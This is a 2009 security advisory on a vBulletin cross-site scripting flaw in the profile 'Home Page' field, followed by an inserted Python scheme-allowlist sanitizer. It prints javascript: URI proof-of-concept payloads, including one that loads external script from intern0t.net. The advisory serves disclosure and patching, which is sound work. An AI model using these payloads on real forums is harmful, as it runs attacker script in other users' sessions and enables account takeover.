VBB 3.8.4 XSS


vBulletin - Cross Site Script Redirection


Versions Affected: 3.8.4/3.7.6/3.6.12
Patches Available: 3.8.4PL1/3.7.6PL1/3.6.12PL1

Info: An XSS flaw within the user profile page has recently been discovered.
This could allow an attacker to carry out an action as a user or obtain
access to a user's account. To resolve this issue, it has been necessary to
release a patch level version of the active versions of vBulletin.

The upgrade process is the same as previous patch level releases: simply
download the patch from the Members Area, extract the files and upload them to
your webserver, overwriting the existing files. There is no upgrade script
required.

As with all security-based releases, we recommend that all customers
upgrade as soon as possible in order to prevent any potential damage
resulting from the flaw being exploited.

Credits: The original finder of the security hole (Jelsoft?)

Researched & Disclosed by: MaXe (InterN0T.net)

References:
http://www.vbulletin.com/forum/showthread.php?t=319572


The Advisory

Quote:
The "Home Page" field in the user profile was only checking the user input
for either "www" or the following regular expression, written in normal text:
any letters from A to Z and/or numbers from 0-9 followed by :// will make the link valid.

The output in the Home Page field is encoded, most likely with htmlspecialchars(),
however before the patch it did not check whether a user could create a link that
would send an unknowing user to either the data: or javascript: URI scheme.

The only limits in the Home Page field are:
- 90 character limit
- Characters will be converted to HTML entities.
- We can only use the data or javascript URI scheme.

This means that we should avoid " since that becomes &quot;. The other
characters like < will become &lt;, which is %3C, which is almost the same.
Please see how htmlentities() and htmlspecialchars() work in PHP.

The following scheme input as home page will alert 0:
javascript://%0adocument.write(<script>alert(0)</script>)

The following scheme is a Proof of Concept that external JavaScript can be loaded:
javascript://%0adocument.write(<script src=http://intern0t.net/.k></script>)

The following URL contains a working Proof of Concept on the Contact Page:
http://forum.intern0t.net/members/maxe.html (will be removed soon)
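The root cause described above is a URL field validated by a "www or anything://" pattern and then only HTML-encoded on output, which does nothing about the scheme. The following is an added example (not vBulletin's code, written in Python rather than PHP for illustration) that puts a constructed approximation of that legacy check next to a scheme allowlist; it also normalizes the input the way browsers do before reading a scheme, so variants with embedded tabs/newlines or leading spaces are caught as well.

```python
import re
from typing import Optional
from urllib.parse import urlsplit

# Constructed approximation of the pre-patch check the advisory describes:
# accept if the value contains "www" or "<letters/digits>://" anywhere.
LEGACY_RE = re.compile(r'[a-z0-9]+://', re.IGNORECASE)


def legacy_accepts(url: str) -> bool:
    return 'www' in url.lower() or LEGACY_RE.search(url) is not None


ALLOWED_SCHEMES = {'http', 'https'}
_TAB_NL_RE = re.compile(r'[\t\n\r]')
_C0_SPACE = ''.join(map(chr, range(0x21)))  # NUL..US plus space
_SCHEME_RE = re.compile(r'^([a-z][a-z0-9+.\-]*):', re.IGNORECASE)


def _clean(url: str) -> str:
    # Browsers drop ASCII tab/newline anywhere in a URL and strip leading and
    # trailing C0 controls/spaces before reading the scheme; a check that does
    # not do the same is bypassed by "java\nscript:" or " javascript:".
    return _TAB_NL_RE.sub('', url).strip(_C0_SPACE)


def scheme_of(url: str) -> Optional[str]:
    # The scheme is everything before the first ':'. The %0a in the advisory's
    # payload sits after the colon, so it never changes the scheme seen here.
    m = _SCHEME_RE.match(_clean(url))
    return m.group(1).lower() if m else None


def sanitize_home_page(url: str, max_len: int = 90) -> Optional[str]:
    """Return the value to store, or None if it must be rejected."""
    url = _clean(url)
    if not url or len(url) > max_len:  # the field's 90 character limit
        return None
    scheme = scheme_of(url)
    if scheme is None:
        # bare host such as www.example.com: make the scheme explicit
        # (a scheme-less host with a port must be entered with http://)
        url = 'http://' + url
    elif scheme not in ALLOWED_SCHEMES:
        # rejects javascript:, data:, vbscript: and every other scheme
        return None
    # require a host so that "http://" alone is not stored
    return url if urlsplit(url).netloc else None
```

Output encoding such as htmlspecialchars() is still required on the echoed value; the allowlist only closes the scheme gap, it does not replace it.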

Solution
Update to the newest version of vBulletin: 3.8.4PL1/3.7.6PL1/3.6.12PL1


Conclusion
vBulletin is generally a safe and secure platform to use for large forums.
This security hole/exploit is implausible to actually work against people.
Please see: http://forum.intern0t.net/blogs/maxe...scripting.html for more information!

Disclosure Information:
- Unknown date of when the vendor found the security hole.
- Vendor released patch on the 7th October 2009.
- Security hole researched and disclosed on 8th October 2009.


All of the best,
MaXe